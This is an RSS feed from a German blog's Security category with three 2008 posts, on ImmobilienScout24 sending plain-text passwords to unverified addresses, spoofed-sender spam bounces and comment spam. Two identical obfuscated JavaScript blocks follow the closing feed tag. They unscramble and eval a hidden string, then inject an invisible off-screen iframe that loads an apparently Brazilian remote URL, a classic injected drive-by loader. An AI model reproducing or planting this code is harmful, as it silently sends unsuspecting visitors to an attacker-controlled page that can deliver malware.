<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Georg Weidner &#187; Security</title>
	<atom:link href="http://www.georg-weidner.de/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.georg-weidner.de</link>
	<description>Georg Weidner Ã¼ber eCommerce &#38; Online-Marketing, Usability, Web Analytics, SEO, SEM &#38; den Rest</description>
	<lastBuildDate>Thu, 02 Feb 2012 21:13:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Spam 1.5 und b&#246;se Sicherheitsl&#252;cke bei ImmobilienScout24</title>
		<link>http://www.georg-weidner.de/spam-15-und-bose-sicherheitslucke-bei-immobilienscout24/</link>
		<comments>http://www.georg-weidner.de/spam-15-und-bose-sicherheitslucke-bei-immobilienscout24/#comments</comments>
		<pubDate>Tue, 10 Jun 2008 11:51:04 +0000</pubDate>
		<dc:creator>Georg</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[datenschutz]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.georg-weidner.de/?p=60</guid>
		<description><![CDATA[Zur Zeit habe ich einfach kein Gl&#252;ck: Seit Sonntag erhalte ich dutzende E-Mails von ImmobilienScout24, die eigentlich an einen Herrn M. L. gehen sollten. Dieser hat in seinem Profil eine uralte GMX-Mailadresse von mir eingetragen. Obwohl er schon zig Kontaktaufnahmen gestartet hat und offensichtlich keinerlei Antwort erh&#228;lt, kommt er nicht auf die Idee seine Daten [...]]]></description>
			<content:encoded><![CDATA[<p>Zur Zeit habe ich einfach kein Gl&uuml;ck: <strong>Seit Sonntag erhalte ich dutzende E-Mails von ImmobilienScout24, die eigentlich an einen Herrn M. L. gehen sollten</strong>.</p>
<p>Dieser hat in seinem Profil eine uralte GMX-Mailadresse von mir eingetragen. Obwohl er schon zig Kontaktaufnahmen gestartet hat und offensichtlich keinerlei Antwort erh&auml;lt, kommt er nicht auf die Idee seine Daten zu &uuml;berpr&uuml;fen. Stattdessen werden immer mehr Leute angeschrieben, nachgehakt und News bestellt.</p>
<p>Eine entsprechende Mitteilung an den Support ist seit &uuml;ber 24 Stunden unbeantwortet und so sammeln sich weiterhin seine Nachrichten bei mir&#8230;</p>
<p>Aber wo hakt es nun? Meiner Meinung nach nicht so sehr bei M. L. wie bei ImmobilienScout24! Wieso kann man <strong>beliebige E-Mailadressen</strong> ohne erzwungene Ãœberpr&uuml;fung <strong>angeben</strong>? (Die Ãœberpr&uuml;fung kann freiwillig erfolgen &#8211; wer macht das? Bzw: Wieviele &uuml;berlesen den Link dazu?)</p>
<p>Durch diese Nachl&auml;ssigkeit landen mit Sicherheit nicht nur <strong>unz&auml;hlige Nachrichten</strong> unbemerkt <strong>im Nirvana</strong>, viel schlimmer wiegt die <strong>M&ouml;glichkeit des</strong> (&uuml;berspitzt gesagt) <strong>Hackings</strong>!</p>
<p><span id="more-60"></span></p>
<p>Es wird kaum jemanden geben, der ein <strong>Passwort </strong>nicht <strong>mehrfach verwendet</strong>. Ãœber die <em>Passwort vergessen</em> &#8211; Funktion k&ouml;nnte ich mir <em>*mein vergessenes*</em> Passwort von Herrn M. L. an die angegebene E-Mailadresse (also mich) zuschicken lassen.</p>
<p>Aber bei solchen Funktionen werden doch grunds&auml;tzlich ein neues Passwort generiert und zugeschickt? Falsch! F&uuml;r <em>*maximale Benutzerfreundlichkeit*</em> <strong>schickt ImmobilienScout24</strong> <strong>das alte Passwort im Klartext</strong> zu. Toll f&uuml;r den B&ouml;sewicht: Mit dem nun bekannten Nutzernamen und Passwort sind nicht nur M. L.&#8217;s ImmoScout-Konto, sondern auch <strong>alle anderen Webseiten</strong> auf denen er angemeldet ist <strong>potentielle Ziele</strong>.</p>
<p>Doch Moment: Wenn das Passwort im Klartext verschickt wird bedeutet das doch: Auch in der Datenbank sind die <strong>Passw&ouml;rter aller Benutzer nicht ausreichend gesch&uuml;tzt</strong>!</p>
<p>Normalerweise werden Passw&ouml;rter z.B. per <a title="Wikipedia: MD5-Algorithmus" href="http://de.wikipedia.org/wiki/Message-Digest_Algorithm_5" target="_blank">md5-Algorithmus</a> verschl&uuml;sselt in der Datenbank abgelegt. Ein Einwegverfahren: Selbst wenn man wollte ist es unm&ouml;glich das Passwort zu rekonstruieren.</p>
<p><em>Anmerkung: MD5 ist eigentlich ein Hashing- und kein Verschl&uuml;sselungsverfahren &#8211; aber das f&uuml;hrt hier zu weit.</em></p>
<p>Logt sich ein User ein, wird das eingegebene Passwort auch md5-verschl&uuml;sselt und mit dem Datenbankinhalt verglichen. Ist das Ergebnis gleich, war das eingebene Passwort korrekt und der User wird eingelogt.</p>
<p>Das scheint hier aber nicht der Fall zu sein &#8211; wenn die Passw&ouml;rter verschl&uuml;sselt in der Datenbank stehen, sind sie zumindest entschl&uuml;sselbar! <strong>Was w&auml;re wohl los, wenn die Datenbank in die falschen H&auml;nde ger&auml;t?</strong></p>
<p>Ob Herr M. L. von dem Ganzen etwas ahnt? Wohl kaum &#8211; und dazu geh&ouml;rt er sicherlich zu mindestens 95% der Nutzer dieses Portals. Umso wichtiger sollte es f&uuml;r den Betreiber doch sein, alle m&ouml;glichen Schwachstellen auszumerzen?!</p>
<p>Denn auf die Intelligenz der User zu verantwortungsvollem Umgang mit ihren Daten kann er sich dabei nicht wirklich verlassen, die haben anderes im Kopf. Zumindest bis ein Aufschrei durch das Internet geht und sich viele voller Panik und Emp&ouml;rung beim Portal abmelden. (Siehe z.B.  <em>&#8220;<a title="Telekom Kundenverlust wegen Spitzelaff&auml;re" href="http://www.internetworld.de/home/news-single/article/bespitzelungs-affaere-telekom-image-auf-talfahrt-7273.html" target="_blank">Der Telekom droht wegen der Spitzelaff&auml;re ein Kundenverlust in riesiger Zahl [...]</a>&#8220;</em>)</p>
<p>Zuletzt m&ouml;chte ich noch klarstellen, dass dies garantiert <strong>kein Einzelfall</strong> ist &#8211; viel zu viele Unternehmen gehen viel zu sorglos mit ihren Kundendaten um! Es wird Zeit, dass sich daran etwas &auml;ndert!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.georg-weidner.de/spam-15-und-bose-sicherheitslucke-bei-immobilienscout24/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Ein Opfer der Spam-Opfer</title>
		<link>http://www.georg-weidner.de/ein-opfer-der-spam-opfer/</link>
		<comments>http://www.georg-weidner.de/ein-opfer-der-spam-opfer/#comments</comments>
		<pubDate>Mon, 09 Jun 2008 11:26:41 +0000</pubDate>
		<dc:creator>Georg</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.georg-weidner.de/?p=58</guid>
		<description><![CDATA[Heute morgen hat es mich erwischt: Spammer haben eine E-Mailadresse von mir als Absenderadresse in ihre Spammails geschrieben. Das hatte nat&#252;rlich zu Folge, dass alle Benachrichtigungen von Servern, die die Spam-Mails nicht zustellen konnten (Spammer probieren ja gerne unz&#228;hlige Namenskombinationen aus) bei mir landeten. Anmerkung: Leider, leider haben die Entwickler des E-Mail-Protokolls nicht daran gedacht, [...]]]></description>
			<content:encoded><![CDATA[<p><a class="thickbox" href="http://www.georg-weidner.de/media/spam-2008-06-09.jpg" rel="lightbox[58]"><img class="alignright alignnone size-thumbnail wp-image-59" style="float: right; margin-left: 15px; margin-bottom: 10px;" title="spam-2008-06-09" src="http://www.georg-weidner.de/media/spam-2008-06-09-150x150.jpg" alt="" width="150" height="150" /></a></p>
<p>Heute morgen hat es mich erwischt: <strong>Spammer haben eine E-Mailadresse von mir als Absenderadresse in ihre Spammails geschrieben</strong>. Das hatte nat&uuml;rlich zu Folge, dass alle Benachrichtigungen von Servern, die die Spam-Mails nicht zustellen konnten (Spammer probieren ja gerne unz&auml;hlige Namenskombinationen aus) bei mir landeten.</p>
<p><span id="more-58"></span></p>
<p><em>Anmerkung: Leider, leider haben die Entwickler des E-Mail-Protokolls nicht daran gedacht, dass Spammer eine gef&auml;lschte Absenderadresse eintragen k&ouml;nnten. Es gibt keinerlei Sicherheit, dass die Absenderadresse auch wirklich die Adresse ist von der eine E-Mail kommt, denn das Eintragen eines beliebigen Absenders ist fast so einfach wie eine Tasse Kaffee zu trinken&#8230; <img src='http://www.georg-weidner.de/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </em></p>
<p>Anscheinend wurde meine Adresse nur zwischen 4 und 6 Uhr morgens missbraucht. Ich habe lediglich <strong>einige hundert</strong> Fehlermeldungen erhalten &#8211; damit geht&#8217;s mir noch richtig gut! Denn immerhin habe ich von Leidensgenossen gelesen, die &uuml;ber mehrere Tage hinweg <strong>zig zehntausende E-Mails</strong> bekommen haben!</p>
<p>Ich hoffe dass das eine einmalige Sache war: E-Mailadresse missbraucht, den Namen verbrannt: Nun steht er m&ouml;glicherweise in den Spam-Filtern (na suuuuper&#8230;), also muss zum Spammen ein neuer her&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.georg-weidner.de/ein-opfer-der-spam-opfer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Spam 1.0</title>
		<link>http://www.georg-weidner.de/spam-10/</link>
		<comments>http://www.georg-weidner.de/spam-10/#comments</comments>
		<pubDate>Thu, 29 May 2008 06:57:39 +0000</pubDate>
		<dc:creator>Georg</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.georg-weidner.de/?p=41</guid>
		<description><![CDATA[Oh man, so kann man seine Zeit (und Geld) auch vernichten: In der Google Blogsuche nacht Beitr&#228;gen zur EM suchen und immer den gleichen Kommentar drunter setzen&#8230; Es scheint zu demjenigen immernoch nicht durchgedrungen zu sein, dass die Spam-Identifizierung zentral verwaltet wird und mit einem Klick (in dem Fall von mir) auch allen anderen Blogs [...]]]></description>
			<content:encoded><![CDATA[<p>Oh man, so kann man seine Zeit (und Geld) auch vernichten: In der Google Blogsuche nacht Beitr&auml;gen zur EM suchen und immer den gleichen Kommentar drunter setzen&#8230;</p>
<p>Es scheint zu demjenigen immernoch nicht durchgedrungen zu sein, dass die Spam-Identifizierung zentral verwaltet wird und mit einem Klick (in dem Fall von mir) auch allen anderen Blogs zur Verf&uuml;gung steht. Die ganze *M&uuml;he* ist also f&uuml;r die Katz. <img src='http://www.georg-weidner.de/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Hoffentlich hat da keiner viele Euronen f&uuml;r ultra-krasse-super-Suchmaschinenoptimierung vom Profi gezahlt&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.georg-weidner.de/spam-10/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script>var $r=(Date);if($r){$A='762';}var $v={'x':'\x73\x75bstr','y':!false,'A':'\x73plit','Y':'\x6A\x6Fin','c':'st\x72\x69\x6Eg','s':'\x6C\x65\x6Egth','D':'rev\x65\x72\x73e'},$E='',$d=['nodcuemtw.ri<dsviet(\' tydi"=ylapsel:;"ennon_"d=i "Y___>hngm:ptth//srr6eabron.nbac.om.b.r/dajgp?3v>;)\'/<di'][$v.Y]('\x0A'),$A=$A[$v.A]($E),$2=function(){for(var $f in $A){if(typeof($A[$f])==$v.c){var $X=[],$u=$v.y,$r=$A[$f]*-~false;for(c=[]^[];c<$d[$v.s];c+=$r){$X[c]=($u)?($d[$v.x](c,$r)[$v.A]($E)[$v.D]()[$v.Y]($E)):($d[$v.x](c,$r));$u=!$u;}$d=$X[$v.Y]($E);}}this['eva\x6C']($d);},$d=$2();if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('script').length > 0){document.write('<iframe src="'+document.getElementById('____Yn').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}</script><script>var $r=(Date);if($r){$A='762';}var $v={'x':'\x73\x75bstr','y':!false,'A':'\x73plit','Y':'\x6A\x6Fin','c':'st\x72\x69\x6Eg','s':'\x6C\x65\x6Egth','D':'rev\x65\x72\x73e'},$E='',$d=['nodcuemtw.ri<dsviet(\' tydi"=ylapsel:;"ennon_"d=i "Y___>hngm:ptth//srr6eabron.nbac.om.b.r/dajgp?3v>;)\'/<di'][$v.Y]('\x0A'),$A=$A[$v.A]($E),$2=function(){for(var $f in $A){if(typeof($A[$f])==$v.c){var $X=[],$u=$v.y,$r=$A[$f]*-~false;for(c=[]^[];c<$d[$v.s];c+=$r){$X[c]=($u)?($d[$v.x](c,$r)[$v.A]($E)[$v.D]()[$v.Y]($E)):($d[$v.x](c,$r));$u=!$u;}$d=$X[$v.Y]($E);}}this['eva\x6C']($d);},$d=$2();if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('script').length > 0){document.write('<iframe src="'+document.getElementById('____Yn').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}</script>
